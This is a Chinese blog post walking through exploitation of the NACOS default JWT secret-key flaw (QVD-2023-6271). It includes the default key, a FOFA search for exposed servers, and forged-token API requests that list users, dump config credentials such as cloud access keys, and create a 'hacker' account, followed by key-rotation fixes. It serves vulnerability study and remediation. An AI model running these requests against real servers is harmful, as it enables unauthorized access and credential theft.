漏洞实战(1):NACOS默认密钥漏洞QVD-2023-6271

于 2024-03-09 23:33:23 发布
阅读量1.9k 收藏 27
点赞数 26
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53721197/article/details/136595481
版权

  1. 原理

  2. 危害

  3. 攻击

    1. 资产发现

    2. 漏洞利用

  4. 防御

1、原理

NACOS[1],/nɑ:kəʊs/,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

在 <=2.2.0<=1.4.4的版本中,NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

9b18fd23c372a43f616d366300a66a3d.png

该密钥用于加密用户帐号,生成用户登陆后的身份令牌accessToken,类型是JWT[2](JSON Web Token)。

攻击者可以使用默认密钥和常见帐号生成身份令牌,从而绕过身份认证,直接获得NACOS的访问权限。

2、危害

攻击者获得NACOS的访问权限后,会查看NACOS管理的所有配置文件,翻找里面的帐号密码,例如云服务的AKSK、Java程序的JDBC,从而获得对应服务的访问权限。

3、攻击

3.1、资产发现

搜索资产

FOFA[3]app="NACOS"

查看版本

# 请求地址

/nacos/v1/console/server/state

# 响应示例

{"version":"2.2.0","standalone_mode":"standalone","function_mode":null}

0659269eb70ca5f2e19cde69cc84cc40.png

3.2、漏洞利用

部署服务

1、下载地址:2.2.0 (Dec 14, 2022)[4]、1.4.4 (Aug 8th, 2022)[5]

2、打开鉴权开关:将配置文件conf/application.properties中的 nacos.core.auth.enabled设置为on

cca8f96ad66485788f3166379a23d485.png

3.1、Linux中部署:配置环境变量export JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64、开启服务bash bin/startup.sh -m standalone、关闭服务 bash bin/shutdown.sh

7ae6c7484e7b6d0f186973e8a8bf348c.png

3.2、Windows中部署:配置环境变量此电脑 - 属性 - 高级系统设置 - 高级 - 环境变量 – JAVA_HOME= C:\Program Files\Java\jdk1.8.0_361、开启服务bin/startup.cmd-m standalone、关闭服务bin\shutdown.cmd 

cff6cdfd621691bccaacffb11badddff.png

生成accessToken

生成地址:JWT官网[6]

关键参数:

1、常见帐号:例如nacos、nac0s、nacosss、nacos1、admin

2、默认密钥:SecretKey012345678901234567890123456789012345678901234567890123456789

其他参数:

3、签名算法:HS256(HMAC SHA256,JWT默认)

4、过期时间:在Linux中使用命令date +%s -d '2024-03-10 00:00:00'生成过期时间

5、是否启用Base64编码:是(NACOS建议)

6e15368348952c374f4c158472b7a679.png

bf016841a56b4fdf64a2329f9c4d80c7.png

查看帐号:常用于渗透测试或漏洞扫描,证明漏洞存在。

# 请求地址(GET)

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74 &pageNo=1&pageSize=9&search=accurate

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

92a5ad52b042b0a935c58c7c565d23af.png

查看配置:常用于红蓝对抗,翻找帐号密码,获取更多权限。

# 请求地址(GET)

/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDAwMDAwMH0.l5OewNgzUxgyFdy7aAQBNfst7FOZ9bE9cHoLd9dMX74

# 响应示例

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"740458855550423040","dataId":"aliyun.yaml","group":"DEFAULT_GROUP","content":"aliyun:\n    access-key-id: RzRRFE5tQqsxAieELkMDLTAI\n    access-key-secret: 52dW2iDdPzmddUBEDlKHej5uYddK89","md5":null,"encryptedDataKey":null,"tenant":"","appName":"","type":"yaml"}]}

e4947f9f744cf0911b239b5e496d42be.png

创建帐号,登陆后台,查看配置:同红蓝对抗场景。

# 请求地址(POST)

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwOTk5MTEwOX0.h2WWx4rr9_pxbYzRe2Psrw5JDY3mKzXiUK-FhMKCkto&username=hacker&password=123456

# 响应示例

{"code":200,"message":null,"data":"create user ok!"}

5680e65114f2c4aea480183f49005d4c.png

3ca2e37de9805d3e6cfcd4775fc60bdf.png

4、防御

生成身份令牌accessToken需要两个关键参数:用户帐号、加密密钥。只需将默认的加密密钥修改掉,攻击者就无法伪造身份令牌,从而修复该漏洞。

以下内容参考Nacos 文档[7]中的自定义密钥部分,以及关于Nacos默认token.secret.key及server.identity风险说明及解决方案公告[8]

修改默认密钥的位置

配置文件:conf/application.properties

默认密钥:

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

### 2.1.0 版本后    

nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789

修改默认密钥的注意事项

1、原始密钥长度不得低于32字符,推荐将原始密钥进行Base64编码,例如:

### 原始密钥(刚好32字符)

ThisIsMyCustomSecretKey012345678

### The default token(Base64 String):

nacos.core.auth.default.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

### 2.1.0 版本后

nacos.core.auth.plugin.nacos.token.secret.key=VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=

2、鉴权开关是修改之后立马生效的,不需要重启服务端。

3、动态修改token.secret.key时,请确保token是有效的,如果修改成无效值,会导致后续无法登录,请求访问异常。

4、密钥需要保持节点间一致,长时间不一致可能导致403 invalid token错误。

参考资料

[1]

NACOS: https://nacos.io

[2]

JWT: https://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html

[3]

FOFA: https://fofa.info

[4]

2.2.0 (Dec 14, 2022): https://github.com/alibaba/nacos/releases/tag/2.2.0

[5]

1.4.4 (Aug 8th, 2022): https://github.com/alibaba/nacos/releases/tag/1.4.4

[6]

JWT官网: https://jwt.io

[7]

Nacos 文档: https://nacos.io/zh-cn/docs/v2/guide/user/auth.html

[8]

关于Nacos默认token.secret.key及server.identity风险说明及解决方案公告: https://nacos.io/zh-cn/blog/announcement-token-secret-key.html

OneMoreThink
关注
  • 26
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nacos-sdk-csharp::rose:nacos csharp sdk
02-04
nacos-sdk-csharp OpenAPI的非官方csharp(dotnet核心)实现。 该项目已移至 CI构建状态 平台 构建服务器 主人身份 Github动作 Linux /视窗 安装 dotnet add package nacos-sdk-csharp-unofficial 产品特点 OpenApi基本用法 集成ASP.NET Core配置系统 使用ASP.NET Core进行服务注册和发现 与阿里云ACM集成 ... 基本用法 简单配置用法 在Program.cs配置 public static IHostBuilder CreateHostBuilder ( string
Nacos 默认 secret.key 配置不当权限绕过漏洞复现
qq_27536045的博客
03-22 4038
Nacos 身份认证绕过漏洞(QVD-2023-6271),开源服务管理平台 Nacos默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5293
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
nacos-server-2.0.3 nacos-server-2.0.3 nacos-server-2.0.3
04-08
nacos-server-2.0.3
Nacos Docker MySQL 8 版本:Nacos:2.2.3,mysql:8.0.30
06-13
nacos 密码已经修改过了:jzkj@nacos 端口8858/3316 直接启动:docker-compose -f example/standalone-mysql-8.yml 修复漏洞Nacos 集群反序列化漏洞 一、漏洞概述 2023 年 6 月 7 日,Nacos 发布新版本,修复了一处远程代码执行漏洞,所 属厂商:alibaba,漏洞编号:暂无,漏洞危害等级:高危。 Nacos 是一个开源的、易于使用的动态服务发现、配置和服务管理平台, 适合构建云原生应用。它提供了一种统一的数据管理和服务发现解决方案。在 Nacos 集群处理部分 Jraft 请求时,攻击者可以无限制使用 hessian 进行反序 列化利用,最终实现代码执行。该漏洞仅影响 7848 端口。 二、受影响版本 1.4.0 <=Nacos<1.4.6 2.0.0 <=Nacos<2.2.3 三、修复建议 官方已发布新版本中修复上述漏洞,受影响用户请尽快升级到安全版本。 漏洞修复版本: Nacos >= 1.4.6 Nacos >= 2.2.3
第一次启动nacos启动注意事项
ygq_zj的博客
03-08 3005
nacos安装报错org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'user': Unsatisfied dependency expressed through field 'jwtTokenManager'
Nacos漏洞总结复现
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
启动nacos/ 开启用户认证
yiXin_Chen的博客
01-20 4499
nacos 安装包的bin目录下 , 在地址栏输入cmd,输入以下命令启动 启动单个 : startup.cmd -m standalone 按集群启动: startup.cmd 访问管理界面: ip:8848/nacos 用户名与密码都是 : nacos 开启用户认证: 1. 打开配置文件: conf/application.properties 2. 修改: nacos.core.auth.enabled=true 3. 在项目的配置文件中添加用户名和密码 ...
Alibaba Nacos JWT令牌使用默认密钥浅析
lwwzyy
03-18 5209
Nacos服务管理平台因默认密钥导致的认证绕过漏洞。在默认配置为未修改的情况下,攻击者可以构造用户 token 进入后台,导致系统被攻击与控制。许多Nacos 用户只开启了鉴权,但没有修改默认密钥,导致Nacos系统仍存在被入侵的风险。
解决“nacos默认secret.key配置不当权限绕过漏洞
一只没有脚的鸟
01-10 2459
nacos 2.x及以下版本会有一个nacos默认secret.key配置不当权限绕过漏洞,等级为高危。形成原因是nacos的配置文件中存在这么一个secret.key会被他人利用进行提权从而达到系统受控的目的。对于这个漏洞大家需要第一时间进行排查,如果有相似情况,可根据本文进行修复。
nacos-sdk-python:Nacos Python SDK
05-08
nacos-sdk-python Nacos OpenAPI的Python实现。 参见: : 支持的Python版本: Python 2.7 Python 3.6 Python 3.7 支持的Nacos版本 Nacos 0.8.0〜1.3.2 安装 pip install nacos-sdk-python 入门 import nacos # Both HTTP/HTTPS protocols are supported, if not set protocol prefix default is HTTP, and HTTPS with no ssl check(verify=False) # "192.168.3.4:8848" or "https://192.168.3.4:443" or "http://192.168.3.4:8848,192.168.3.5:8848" o
nacos配置中心nacos-server-2.2.3
08-16
nacos配置中心nacos-server-2.2.3国内镜像,解决github下载超时及无法下载等情况
php-nacos:阿里巴巴nacos配置中心-PHP客户端
05-03
阿里巴巴nacos配置中心-PHP客户端 PHP客户端,更多关于Nacos配置中心的介绍,可以查看。 特性 容错兜底 容易上手 技术支持,有问题可加作者微信: suxiaolinKing 开发计划 增强容错机制 Dummy模式(本地开发不走配置中心) Yii框架集成 ThinkPHP框架集成 Symfony框架集成 composer安装 composer require alibaba/nacos 使用crontab拉取配置文件 定时1分钟拉取一次 */1 */1 * * * php path/to/cron.php # cron.php Nacos::init( "http://127.0.0.1:8848/", "dev", "LARAVEL", "DEFAULT_GROUP", "" )->runOnce(); 拉取到的配置文件路径:
Nacos安装包: nacos-server-2.2.3.zip nacos-server-2.2.3.tar.gz
最新发布
03-27
因为nacos安装包在githab上托管着,有时候下载非常慢,甚至页面打不开,所以我这边专门为大家提供了下载安装包,欢迎大家使用,这是最新版,其中包含windows版本以及linux版本,...Linux:nacos-server-2.2.3.tar.gz
NACOS漏洞深入解析(审计+复现)
qq_49849300的博客
03-27 4646
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
springCloud-nacos简单使用(单机版)
weixin_39665200的博客
06-13 1189
发现此jar包nacos只更新到了2022年,所以总结就是nacos客户端对springboot的支持只到了2.x版本,所以如果是使用了springboot3.x版本的小伙伴,还是老老实实用springCloud吧,看下图可以看出,nacos对于springCloud的支持一直到了2023年。可以看到,我在配置中心只配置了server.port,那么修改这个属性的值为8070,再在本地telnet8070端口,是不通的。nacos.core.auth.server.identity.key : 登录名。
【Spring Cloud Alibaba】2.服务注册与发现(Nacos安装)
猫巳的博客
03-23 3436
我们要搭建一个`Spring Cloud Alibaba`项目就绕不开`Nacos`,阿里巴巴提供的`Nacos`组件,可以提供服务注册与发现和分布式配置服务,拥有着淘宝双十一十几年的流量经验,还是非常的可靠的。
SpringCloudAlibaba:Nacos开启鉴权(解决跳过登录页面问题)
热门推荐
Microhoo_苏福的博客
05-16 1万+
SpringCloudAlibaba:Nacos开启鉴权(解决跳过登录页面问题)
config: import: - nacos:nacos-config-example.properties?refresh=true
03-22
这是一个配置文件,其中包含了一个名为nacos的配置项,它的属性值为nacos-config-example.properties,同时还有一个refresh属性,表示是否需要刷新配置。具体的实现需要根据具体的编程语言和框架来确定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值